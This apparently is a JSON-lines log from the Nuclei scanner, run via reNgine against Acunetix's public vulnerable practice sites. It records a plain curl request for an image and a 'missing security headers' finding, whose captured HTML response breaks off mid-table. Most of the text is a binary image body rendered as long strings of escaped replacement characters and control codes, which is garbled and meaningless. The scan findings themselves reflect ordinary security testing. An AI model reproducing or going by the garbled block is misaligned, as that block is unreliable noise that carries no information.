\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\u003c\\ufffdH\\ufffd\\u000c\\ufffd\\ufffd\\u0000;\\ufffd\\u0015R+.A\\ufffd\\ufffdG.F\\u0018K\\u0003vTڞ\\ufffde\\u0013\\ufffd\\ufffd\\u003e\\u0000\\ufffd\\u0002p\\u0007`\\ufffd_\\ufffd:\\ufffd\\u0018\\u0002\\ufffd\\u00000A\\ufffdދ\\ufffdC\\ufffd\\\\!\\ufffd\\u001eJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffdH\\ufffdU+Z\\ufffdwQkXBS\\ufffdm\\ufffd\\u0014װ\\ufffd3B\\ufffdȎ\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd+J7\\ufffd\\t\\ufffd\\u0000\\ufffdhI\\ufffd\\ufffd\\ufffd\\u0016j\\u0003\\ufffdG΋\\ufffd\\ufffd{C?\\u0018\\ufffd\\u0013`6\\ufffdd\\ufffd\\ufffd3\\ufffd=s\\ufffd\\ufffd`\\ufffd\\ufffd(\\ufffdȟ3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001b'\\ufffd\\ufffdwཥ\\ufffd\\ufffdW\\u0005\\ufffdM|b\\ufffd\\ufffd\\u001fW\\u0000\\u003cظ\\u0007\\ufffd\\t\\ufffd\\u0015Q\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001e%?J3\\ufffd\\u000f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u000e7\\u000c\\ufffdb\\ufffdօt\\ufffd 3\\ufffd.\\u0006\\ufffd\\ufffd\\ufffd趹\\u001f\\ufffd\\ufffd\\ufffd\\ufffdFYl=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdB\\ufffd\\ufffd\\ufffdYO\\ufffd\\u001f\\ufffd\\ufffd\\ufffdC_:i\\ufffd\\ufffdײ\\ufffd\\ufffdFY,=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdb\\ufffd\\ufffd\\ufffdYO\\ufffd\\u0012\\ufffd\\u0007\\ufffde@Gq\\ufffdՅ\\ufffd\\u0026G\\ufffd\\ufffd\\ufffd[\\u000fhg\\ufffd\\u0014\\ufffdX{C?\\u0018\\ufffd\\ufffd\\u0019t\\ufffd \\u00118j\\ufffd\\u0012\\ufffd\\u0011\\ufffdjSa;2G\\ufffd\\u0013F\\ufffd,=\\ufffd\\ufffd\\ufffdRɇ\\ufffdC?\\u0018\\ufffd\\ufffd#\\ufffd\\ufffd`8\\ufffdZOe$yԨ\\ufffdRwfO2h\\ufffd%\\ufffd\\ufffd3\\ufffd\\ufffdYp\\ufffd\\u0000hg\\ufffd\\u00147\\ufffd}6\\ufffd\\ufffd\\u0010\\u000c(\\ufffd\\ufffd\\u001esK\\ufffd\\ufffdDe\\u0003\\ufffdQ\\ufffd\\u0016#k\\ufffd~1K\\ufffd^\\ufffd\\ufffd\\ufffd(oE\\ufffd\\ufffd~\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdOvSL\\u00188V\\ufffd\\u0008O\\ufffd@\\ufffd\\ufffd{K_\\u0018\\ufffdE\\ufffd\\ufffd埌Q\\ufffd1\\ufffdNH\\ufffd\\u001c\\ufffd\\ufffd\\ufffd M\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffd;W$\\ufffdӷ\\ufffd\\r\\ufffd\\rZ\\ufffd$;m\\ufffdc(\\n\\ufffdT\\u0001\\ufffdI\\ufffd4\\ufffd\\ufffd~\\ufffd\\ufffdŅ\\ufffd׽z\\u0016\\ufffd\\u0014 \\u0001\\u0000\\ufffdE\\ufffd$\\ufffdxk\\u001bl8p\\ufffdϨR\\ufffd\\u0008\\ufffd\\u001d-Ŵ;\\ufffd\\ufffd\\ufffdL!\\ufffd\\ufffdV\\u0016\\ufffd\\u0002\\ufffd+\\ufffd\\u0003\\ufffd\\ufffd\\u001f|\\ufffdu\\ufffd\\ufffdb\\u0008k\\ufffd.:\\ufffd\\u0008\\ufffdLƁZ\\ufffdЃ\\ufffdX\\ufffd\\ufffd\\ufffdh/\\ufffd\\ufffd\\ufffd.B\\ufffdeH))!! H\\ufffd!;lg\\ufffd0▪E\\ufffd}P}\\ufffd(\\ufffd\\ufffd\\ufffd)#(%[\\u001d\\ufffd\\ufffd\\ufffdYWQ\\ufffdJ\\ufffd.\\ufffd\\ufffd\\u0000\\ufffd]\\ufffd\\ufffdb/\\u0007\\u0002\\u001cs\\ufffd@P$\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffd\\u0012\\ufffdSM\\ufffd^\\u000e-A\\u0000\\t܉\\ufffdG\\u0018\\ufffd\\u0016\\ufffd\\ufffdo\\u001crԼ\\ufffdE\\ufffdu\\ufffd+*\\ufffd\\ufffd\\ufffd\\u0000F\\ufffd.\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd˶\\ufffd\\u001a\\ufffd\\ufffd-#+\\ufffd7\\u0004J\\u0013\\ufffda\\u001a\\ufffd \\ufffd\\ufffd\\u0002$M\\tu\\u0019\\ufffd\\ufffd\\ufffd;e\\ufffd\\ufffdYx\\ufffd(\\ufffd6\\u001c\\ufffd!\\u0004\\ufffdY\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u000cN\\ufffd\\u0019E\\ufffdn\\ufffd\\ufffd#\\ufffdm\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffdH1\\ufffd\\u001f\\ufffd\\ufffdڠ\\ufffd\\ufffdɈ\\ufffd\\ufffd\\ufffd[j\\u0015\\ufffd!\\ufffd0\\ufffd\\ufffd\\u0003\\u0007\\ufffd\\u0026\\\"\\u000e\\ufffdj)\\ufffd8\\ufffd\\ufffdIq\\ufffdf\\ufffd\\ufffd}\\ufffd\\ufffd\\u0008\\n'|\\ufffd\\ufffd\\ufffd\\ufffdY+7r\\ufffdJ\\u0017\\ufffd7\\ufffdI\\ufffdU~\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGajȩ\\ufffd\\u003e`x\\ufffd\\ufffdĶ\\ufffd\\ufffd8\\ufffd\\ufffd6\\ufffd]:P\\ufffdFE\\ufffd+*Q\\ufffd\\u0012F\\ufffd\\u00065\\u0010\\ufffdTq\\ufffdC\\u0007yƔ\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0011\\ufffd=\\ufffd\\ufffd\\u0019'\\ufffdy\\ufffdv\\ufffdl\\ufffdp\\ufffd_\\u000cqn+\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd$q\\u001eQ\\ufffd?\\u001aYW\\ufffd\\ufffd\\ufffd\\ufffd\\u000fd}\\u001a\\ufffd\\ufffdq7\\u0015\\ufffd\\ufffd۔\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\t\\u0002\\u000f\\u00025\\u001ae\\u001cF\\ufffd\\ufffd\\ufffd8\\ufffd$\\ufffd\\u0016\\ufffd\\ufffd\\\\C\\u0004f\\ufffd\\ufffd2\\ufffd\\u0008\\ufffd\\u001a\\ufffd5\\u0011\\ufffd\\ufffd\\ufffd\\u0002\\ufffd\\ufffdî[\\ufffdKL\\ufffdխh%N\\u0013\\ufffdh\\ufffd\\u0004\\ufffd\\u001c\\u0001\\u0000o:\\ufffdd[\\ufffd]\\ufffdY\\\\\\ufffd\\ufffdбd\\ufffdW(\\u0005\\ufffd\\ufffd\\u0003S\\ufffd\\t\\ufffd\\u0013\\ufffd\\ufffdŨ\\ufffd{\\ufffd\\u0013\\ufffd\\u003cX4\\ufffd\\ufffd1\\u000b\\ufffd\\ufffd,ߘ\\u0004\\ufffd\\ufffd\\ufffd\\u0000\\u0012\\ufffd\\ufffd\\u003c9H\\ufffd\\ufffd4\\ufffdX\\ufffd\\ufffd\\r\\ufffdp]Y\\ufffd\\u0003\\ufffd\\u0000\\u0019\\\"7\\ufffdQ\\ufffd\\u0015\\ufffd/\\ufffdww\\ufffdu,\\\\:۩\\ufffd\\u0008\\ufffd*ˤ\\ufffd7\\u0018\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd`k\\ufffd\\u001a]\\ufffd\\ufffdmEJ%Dd\\ufffd\\ufffd\\\"gS\\ufffd\\ufffd\\ufffd\\u0013\\ufffd=\\n\\ufffdhe\\ufffd\\ufffd1%J/\\u0016\\u000bn\\ufffdQ\\ufffd۾\\ufffd\\u001fq\\ufffd\\u003cم$\\ufffdj\\ufffd=.\\ufffdR\\ufffd/\\ufffdS\\ufffdhO\\u000e\\ufffd\\u0012\\ufffd$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZe'e\\r9@\\ufffd֯\\ufffdݦ'\\ufffd\\ufffd\\ufffd\\u0012P\\u0014\\ufffd\\u001c\\ufffd\\ufffd\\ufffdse\\ufffd\\ufffd\\u0003A\\ufffd\\ufffdjZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-4\\ufffd\\u0000Y\\u001bk\\ufffd\\ufffd\\ufffd\\u0000\\ufffdr\\ufffdTBGorv\\u001bӏK\\ufffd\\ufffd\\ufffd}I\\u0003i\\\\\\ufffd\\ufffd7\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffdT\\ufffd\\u00044\\ufffdk\\ufffd\\u001d\\ufffd$\\ufffd\\ufffd;N\\u0013vm\\u0014\\ufffd\\ufffd\\ufffdܘ\\ufffdGw\\u0012|\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\n\\ufffd.\\ufffdp\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd皤\\u001d0\\ufffd*\\ufffd\\ufffd\\ufffd\\u001d\\ufffdSC\\u0016WV\\ufffdo\\ufffd9\\ufffd|\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdC\\\"4\\ufffd\\ufffd\\ufffd\\u0013R\\ufffdv\\ufffd.\\ufffd\\ufffd\\u0019\\ufffd\\u001bG\\ufffd\\ufffdVHL\\u0002\\u0006i\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffdޒ]B\\nV\\ufffd\\u0019i\\ufffdl\\ufffdβ\\ufffdF\\u0012\\u001ce\\ufffd\\ufffd\\ufffdЌ\\ufffd@\\u000e\\ufffd\\u003e\\u0014\\ufffd\\ufffd\\u0016\\ufffdYԄ\\ufffdⳒN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\u0016\\ufffdu\\ufffd\\ufffd\\ufffd\\u0010BB\\ufffd\\u001c\\ufffdT\\ufffd\\ufffd\\ufffd\\u001c7\\ufffd4.\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd(\\ufffdV\\u0008B3\\ufffd\\ufffd6\\ufffdغ\\ufffd\\ufffd/\\ufffd\\u0012îu\\ufffd\\ufffd$\\ufffdW]@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffda͵\\ufffd4\\u0014\\u001a\\ufffd\\u001ey\\ufffd\\n@\\ufffd'\\ufffd\\ufffd\\u000c\\ufffd\\u0004F\\ufffd\\ufffd\\u000e\\u001a\\ufffd{\\ufffd\\ufffd\\ufffdܦ\\ufffd(\\ufffd\\ufffdFl\\ufffd\\ufffd\\ufffd*ݻ*\\ufffd\\ufffdT\\u0014\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd*\\u0007\\ufffd\\u0006i\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0010\\ufffdt\\ufffd\\ufffd\\ufffd!qw\\ufffd\\ufffdݷ\\ufffd\\u003e\\ufffd\\t\\ufffdcI\\u0011\\ufffd\\ufffdY\\ufffd[\\u00168\\ufffd\\ufffd-\\u0015t\\ufffd\\u003e\\ufffd\\ufffdP\\ufffdҳ\\u0015\\u0026`(\\ufffd\\u001a\\ufffd\\ufffdüP-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdH\\u001dA=\\ufffd\\ufffdӕ\\u0016٭\\ufffdp\\ufffdmՙ\\ufffdtR\\u0002\\ufffd\\ufffd\\ufffd\\u000f\\ufffdw\\ufffd\\ufffd\\ufffd8G)\\u0007\\ufffdK\\ufffd]N4\\ufffdWn\\ufffd\\u0010\\ufffd\\u0003,\\ufffd\\u000cs\\u0007]\\ufffd3\\\"^HPK\\ufffdF\\ufffdH\\u001a\\ufffdp\\ufffdoDNa]K\\ufffd2\\ufffd\\ufffdHP\\u0008\\ufffd\\ufffdy\\ufffd}\\ufffd\\ufffdU\\ufffd,57=Z\\ufffdn\\ufffd\\ufffd1\\u0019c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\u0016\\u0001c\\n͉\\ufffd\\u0016\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\u0008\\ufffd\\ufffdJں\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdB\\u000bn%3\\u0005\\u0000\\ufffdF\\ufffd{ֵ\\ufffd\\u001bl\\u0008B\\u0019lI\\ufffd\\ufffd))H\\ufffd\\ufffd\\u0003a\\ufffd\\u001d\\ufffd\\ufffdS\\\\\\ufffdn\\u001dYm$+)\\ufffd刐 \\ufffd\\u000c\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd0\\ufffd\\ufffdҜ\\ufffdi!JP\\ufffd,L\\ufffd\\u0001\\u001aL\\ufffd\\ufffd\\u001fJ\\ufffd|\\ufffd,p\\ufffdKRB^t\\u0005\\ufffd\\u0000\\ufffd\\ufffd\\ufffdh;\\ufffdj\\ufffdͲ\\ufffdԧs\\ufffd\\ufffdH\\ufffdV\\ufffd\\ufffdm\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdC8\\ufffd,\\ufffd!\\ufffd\\ufffd\\ufffd;\\ufffdbg:\\ufffd\\u0004\\ufffd5\\ufffd\\u0018\\u001a\\ufffd\\ufffd.\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\u0002oqE\\ufffd\\u0013n\\ufffd\\ufffdR\\u001a \\ufffd\\u0002x}k\\ufffdz\\u0011\\ufffd3\\ufffd\\ufffd\\nn\\ufffd\\ufffd9n\\u0002V\\ufffd$\\ufffd\\ufffd\\ufffdQ׈\\u0002I܃\\ufffdy\\u0026 \\ufffd\\\\\\ufffdT\\ufffd\\ufffdF\\ufffdL@\\u001e\\u0002\\ufffd\\ufffd\\ufffd^\\u001e\\ufffdk\\ufffdu\\ufffd\\ufffd\\ufffdD\\u0018\\ufffd\\ufffd+\\ufffd^\\ufffd\\ufffd\\u0004\\ufffd\\u0019\\u0013\\ufffdY\\ufffd\\u0015\\ufffd\\ufffd\\u001b[莩\\ufffdħi\\ufffd\\u000f\\ufffd:\\ufffd\\ufffd\\ufffdc\\ufffd\\u003c\\u000b\\ufffd6\\u0014d\\ufffd*$\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd]\\ufffd\\tm\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\u000e\\ufffdR\\ufffd\\ufffdb\\ufffd\\ufffd\\ufffd)\\u0026 \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd@\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd2r\\ufffd)L\\ufffd\\u0000\\ufffd\\u0000\\ufffd\\ufffd\\ufffd,=\\ufffdш\\u000b\\ufffd”\\ufffd܅(\\t\\ufffd\\ufffd\\u0015\\ufffd\\u0004\\ufffd?:1w\\u0017\\ufffd\\ufffdZP\\ufffd\\ufffd%\\t\\ufffd`(\\ufffd\\ufffd\\ufffdD\\ufffd\\ufffd.\\ufffd \\ufffdq\\ufffd\\ufffd\\u0000!\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffdY\\ufffdw+\\ufffd\\ufffd\\u0012\\ufffd,)X\\ufffda`6\\ufffd\\u0018\\ufffd\\ufffd*x\\ufffd1\\u0014K\\ufffdZ\\ufffd\\ufffd\\u0007\\ufffdz\\ufffd,\\ufffd\\ufffdHS\\u0004\\ufffd)\\u0006\\u000c\\ufffdG\\u0001 \\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffdıD\\ufffd\\ufffd\\ufffd*ԭZ\\u00007\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\\\=\\t’\\ufffdR-\\ufffd\\ufffd\\ufffd\\u0010]\\ufffdh\\ufffd\\ufffd]~T\\ufffd\\ufffde(Ő\\u0005\\ufffdp\\ufffd\\ufffd\\ufffd\\u0004\\u0003\\ufffd\\u001a\\ufffd*+2kZ\\ufffd\\u0015Z\\u0000D\\u0014\\u0008\\ufffdYB9V\\ufffdp\\u0002L\\ufffdԤ\\ufffd\\ufffdIWn\\ufffd\\ufffd\\u0016\\ufffd\\ufffdm\\u0026@\\ufffd\\ufffdL\\ufffd37\\u001a\\ufffd\\ufffdRX)YЂ)\\ufffd\\ufffd \\tN\\u001eop\\ufffd/\\ufffdR\\ufffd\\ufffd\\u000eGF\\ufffdDhF\\ufffd6:\\ufffdM2ѻ\\ufffd[\\ufffd\\ufffd\\u0001SZ\\u0012\\ufffdǺ\\ufffdC\\ufffdAkv\\ufffd\\ufffdQ\\r\\ufffd\\u0018:\\ufffdH\\ufffd\\ufffdD*]\\ufffdU\\ufffdH\\n\\ufffdII\\u0013\\u001bH\\u001e\\u0015\\ufffdnQn-`(\\ufffd\\ufffd\\ufffd\\ufffdG\\u0010\\ufffd\\u0013\\ufffdv\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffd5a\\u0017\\ufffdD\\ufffd\\ufffd\\u0000\\ufffd\\ufffdu\\ufffd\\ufffd\\ufffdx\\ufffd\\u0008y\\ufffd\\ufffd\\ufffd\\u0000\\u0002#\\ufffd\\ufffd\\u001bT\\ufffd\\ufffdJ\\ufffdz\\ufffd\\u0007Q\\ufffd\\ufffdc_\\ufffdY%L(%o\\u0010hu\\ufffd7\\tZb\\u0012\\ufffd\\\"u\\ufffd\\ufffdH\\ufffdTn\\\\\\ufffdܽVT\\u0015+\\ufffd\\n\\ufffd\\u0012\\u000e\\ufffd\\ufffdX\\ufffd踸jє\\ufffd\\u001a\\ufffd~\\ufffd뫺ZD\\ufffd\\ufffd\\ufffdc0\\u0004\\u001f\\ufffdW\\ufffdd.\\ufffd\\ufffdIq3m`\\ufffd\\ufffdc9\\u0019\\u001bo\\ufffd\\ufffdY\\u003eC\\ufffd\\ufffd\\ufffd-\\ufffd%\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd'X'\\ufffdO\\ufffd\\ufffd[\\ufffd\\ufffdn\\ufffdajNl\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd:V\\ufffd\\ufffdʄ'a\\ufffdkm$\\ufffd\\u001e\\ufffd\\ufffdS\\u0002\\ufffdy\\ufffd\\u0015\\u0003A\\ufffd_€a\\ufffd.\\ufffd\\u0001\\ufffd!#\\ufffd\\ufffd\\ufffdJ\\ufffdI\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdg \\ufffdGuk\\ufffdq`\\u0010\\ufffd\\ufffd-\\ufffd/1\\n'y\\ufffd\\ufffd/4\\ufffd25\\u0006x\\ufffd\\u0014\\ufffd\\ufffd\\u0010u\\ufffd\\u001ba\\ufffd`%:\\ufffdG\\u00045\\ufffd3j\\ufffd\\ufffdH8\\ufffd\\ufffd\\u0004\\ufffd\\u0000\\ufffdPU\\ufffd'¶1|=~\\ufffd\\ufffd[Z\\u0003-\\ufffd\\ufffd\\ufffd:\\ufffdy\\ufffd\\ufffd\\ufffd\\u001d\\u0012e-\\u0002\\ufffd$\\ufffd\\ufffd \\rD\\ufffdυ[\\ufffdR\\ufffdc\\r-)!\\u000f9\\ufffdW08\\u0008\\ufffd|\\ufffd\\u0014\\ufffd7VȄX\\u0026(ղ\\ufffds\\u0002\\u0008%*\\ufffd\\u001fޝ\\ufffd\\\\e\\u0018\\ufffd\\ufffdWn\\ufffd\\ufffd\\ufffdO\\u003e:\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\n\\u001c$fȭ\\ufffd\\ufffd@\\ufffd\\u0002\\ufffd (F\\ufffd)\\ufffd˽Ir\\u0017$\\ufffd٣qg\\n\\ufffd\\ufffd\\u0019\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000T\\ufffd\\u000c\\u001f\\ufffd\\u001c\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd(\\ufffd\\ufffd'.i\\ufffd׉\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdʙ\\ufffd;q\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffdFRM\\ufffdJ\\ufffdR\\t\\ufffd\\u001b\\ufffd\\u001fÊ\\ufffd*\\u0000\\ufffd\\ufffd\\ufffd0EJ\\ufffd\\ufffd\\u0000\\ufffd\\ufffd \\u000eU\\ufffd\\u0002\\ufffd\\tY\\ufffd䟥[w\\ufffd\\n\\ufffd\\u0000Ӑ\\ufffdP\\ufffd\\ufffdW\\t5\\ufffd\\ufffd6\\ufffd\\u0001eAGI\\u001a\\u0011\\ufffdUD)eq$\\ufffdw\\ufffd|\\ufffdVR\\u0012\\ufffd\\u0008\\ufffdt\\\"L\\ufffdƄ\\ufffd\\ufffd\\t\\ufffdڛ\\ufffd\\ufffdL\\ufffds\\u001e4\\ufffd|\\ufffd\\ufffd\\u0001\\u0000\\u0001\\ufffd\\u0001\\ufffd\\ufffd\\ufffdJ\\ufffd2\\ufffdG7*\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\u000e\\ufffd\\nT\\ufffd\\ufffd\\u003c\\u0012\\ufffd\\ufffd\\ufffd\\ufffdvaCj\\ufffd\\ufffd\\ufffd\\ufffd*p\\ufffd\\ufffd\\u001b\\ufffd#\\ufffdTEڒ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdM\\u000f=\\ufffdB\\ufffd'bi\\ufffd)?\\u00029\\ufffdy-\\ufffd.V\\ufffd\\ufffd\\ufffd\\u0004\\ufffd́\\ufffd\\ufffd\\ufffd]\\ufffd:\\ufffd\\u0015\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdrgi֚\\ufffd\\u001f\\ufffd\\ufffdU\\ufffd\\ufffd:xҚ\\u0007\\ufffd\\u0012\\ufffdp\\ufffdУ\\ufffdS\\ufffd\\rj\\ufffdM\\ufffd\\ufffd\\ufffd\\u0006\\ufffdx\\u0011\\ufffdR\\ufffdO\\ufffduQ\\u003c\\ufffdY\\ufffd\\u0014\\ufffd\\ufffdJ\\ufffdO}3\\ufffdQ\\ufffd懲\\u0015\\ufffdҖ\\u0000H\\u0003\\ufffd\\ufffdL٥e!*\\ufffdxD\\ufffda\\t#:\\t\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0010\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0026*\\ufffd)\\\"\\ufffd(ˆ\\u0014aL\\u000b\\u001bR\\ufffd\\ufffd\\u001a\\ufffd\\u0010A(\\u003cx\\ufffd\\ufffdP\\ufffdJ\\ufffdUqrd\\ufffd5#6\\ufffd'\\ufffdZ\\r::\\ufffd\\ufffd\\u0010L\\ufffdsN\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdw\\ufffd\\ufffd²z\\ufffdm*\\ufffd4\\ufffd\\u00007\\u0026\\u0016gp5=\\ufffd\\ufffdR\\ufffd\\ufffd*A\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdي\\ufffdՙ\\ufffd*%i@$\\ufffd`i\\ufffdk!\\ufffd!S\\u001a\\ufffd|\\ufffdҥ\\\\\\ufffd\\u000e\\ufffd\\ufffd$\\u0014\\ufffd\\u0002t\\ufffdj\\u00022\\ufffd@m R\\ufffdW\\ufffd1f̤\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0012\\ufffd\\ufffdp\\ufffd\\ufffdJ\\ufffd\\u0008Ե(\\ufffdcz\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdiR\\ufffdPV\\ufffd\\u000c\\ufffdy%m\\ufffd\\ufffd\\ufffd\\u001fqS%\\u00031\\u001e?*T\\ufffd\\u003eE\\u0011\\u00039\\u0011\\ufffd\\u003e\\ufffdj\\ufffd\\t\\ufffd\\u003e\\ufffdR\\ufffdQ\\u0001\\ufffdN\\ufffd\\u0014\\ufffdz\\ufffd@ޕ*Ҹ2ˑ\\ufffd\\u00026\\u001bTKBH:R\\ufffdQ\\ufffd\\u001c[I))\\u0012\\u0007q\\ufffdLI\\u0001\\u000f\\u00109q\\ufffdJ\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffd\\\\P\\u0011=\\ufffd\\ufffdUf\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:40.012569901Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"www.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://www.vulnweb.com\",\"matched-at\":\"http://www.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: www.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n 